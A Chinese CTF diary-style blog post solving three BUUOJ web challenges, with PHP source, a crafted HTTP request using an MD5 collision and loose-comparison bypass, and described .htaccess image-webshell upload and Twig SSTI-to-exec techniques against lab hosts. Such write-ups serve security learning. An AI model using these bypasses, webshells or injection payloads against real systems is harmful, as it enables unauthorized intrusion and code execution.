buu摸鱼日记17
[MRCTF2020]Ez_bypass
简单的索然无味,真的是ez啊
<?php
if (isset($_GET['gg']) && isset($_GET['id'])) {
$id = $_GET['id'];
$gg = $_GET['gg'];
if (md5($id) === md5($gg) && $id !== $gg) {
echo 'You got the first step';
if (isset($_POST['passwd'])) {
$passwd = $_POST['passwd'];
if (!is_numeric($passwd)) {
if ($passwd == 1234567) {
echo 'Good Job!';
highlight_file('flag.php');
die('By Retr_0');
} else {
echo "can you think twice??";
}
} else {
echo 'You can not get it !';
}
} else {
die('only one way to get the flag');
}
} else {
echo "You are not a real hacker!";
}
} else {
die('Please input first');
}
}
POST /?gg=%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%00%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%55%5d%83%60%fb%5f%07%fe%a2&id=%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%02%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%d5%5d%83%60%fb%5f%07%fe%a2 HTTP/1.1
Host: 9aa5dd64-16cb-4d4c-9cfa-94b517f81790.node3.buuoj.cn
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 15
Origin: http://9aa5dd64-16cb-4d4c-9cfa-94b517f81790.node3.buuoj.cn
Connection: close
Referer: http://9aa5dd64-16cb-4d4c-9cfa-94b517f81790.node3.buuoj.cn/?gg=%254d%25c9%2568%25ff%250e%25e3%255c%2520%2595%2572%25d4%2577%257b%2572%2515%2587%25d3%256f%25a7%25b2%251b%25dc%2556%25b7%254a%253d%25c0%2578%253e%257b%2595%2518%25af%25bf%25a2%2500%25a8%2528%254b%25f3%256e%258e%254b%2555%25b3%255f%2542%2575%2593%25d8%2549%2567%256d%25a0%25d1%2555%255d%2583%2560%25fb%255f%2507%25fe%25a2&id=%254d%25c9%2568%25ff%250e%25e3%255c%2520%2595%2572%25d4%2577%257b%2572%2515%2587%25d3%256f%25a7%25b2%251b%25dc%2556%25b7%254a%253d%25c0%2578%253e%257b%2595%2518%25af%25bf%25a2%2502%25a8%2528%254b%25f3%256e%258e%254b%2555%25b3%255f%2542%2575%2593%25d8%2549%2567%256d%25a0%25d1%25d5%255d%2583%2560%25fb%255f%2507%25fe%25a2
Upgrade-Insecure-Requests: 1
passwd=1234567a
[GXYCTF2019]BabyUpload
还以为是什么高级的题,结果只是只允许jpg
<?php
session_start();
echo "<meta http-equiv=\"Content-Type\" content=\"text/html; charset=utf-8\" />
<title>Upload</title>
<form action=\"\" method=\"post\" enctype=\"multipart/form-data\">
上传文件<input type=\"file\" name=\"uploaded\" />
<input type=\"submit\" name=\"submit\" value=\"上传\" />
</form>";
error_reporting(0);
if(!isset($_SESSION['user'])){
$_SESSION['user'] = md5((string)time() . (string)rand(100, 1000));
}
if(isset($_FILES['uploaded'])) {
$target_path = getcwd() . "/upload/" . md5($_SESSION['user']);
$t_path = $target_path . "/" . basename($_FILES['uploaded']['name']);
$uploaded_name = $_FILES['uploaded']['name'];
$uploaded_ext = substr($uploaded_name, strrpos($uploaded_name,'.') + 1);
$uploaded_size = $_FILES['uploaded']['size'];
$uploaded_tmp = $_FILES['uploaded']['tmp_name'];
if(preg_match("/ph/i", strtolower($uploaded_ext))){
die("后缀名不能有ph!");
}
else{
if ((($_FILES["uploaded"]["type"] == "
") || ($_FILES["uploaded"]["type"] == "image/jpeg") || ($_FILES["uploaded"]["type"] == "image/pjpeg")) && ($_FILES["uploaded"]["size"] < 2048)){
$content = file_get_contents($uploaded_tmp);
if(preg_match("/\<\?/i", $content)){
die("诶,别蒙我啊,这标志明显还是php啊");
}
else{
mkdir(iconv("UTF-8", "GBK", $target_path), 0777, true);
move_uploaded_file($uploaded_tmp, $t_path);
echo "{$t_path} succesfully uploaded!";
}
}
else{
die("上传类型也太露骨了吧!");
}
}
}
?>
于是传了png的我像个憨批找了半天问题,结果依旧是个.htaccess+图片马
[BJDCTF2020]Cookie is so stable
测试了一下,cookie里的user 是ssti的注入点
测了下感觉不是flask,然后查了一下才知道是twig
https://zhuanlan.zhihu.com/p/28823933
这文章不错,拔出payload直接打,就拿到flag了
就是调用php的exec函数(要是被ban就不太好了)
PREVIOUS摸鱼日记之十六
NEXTBuu摸鱼日记之十八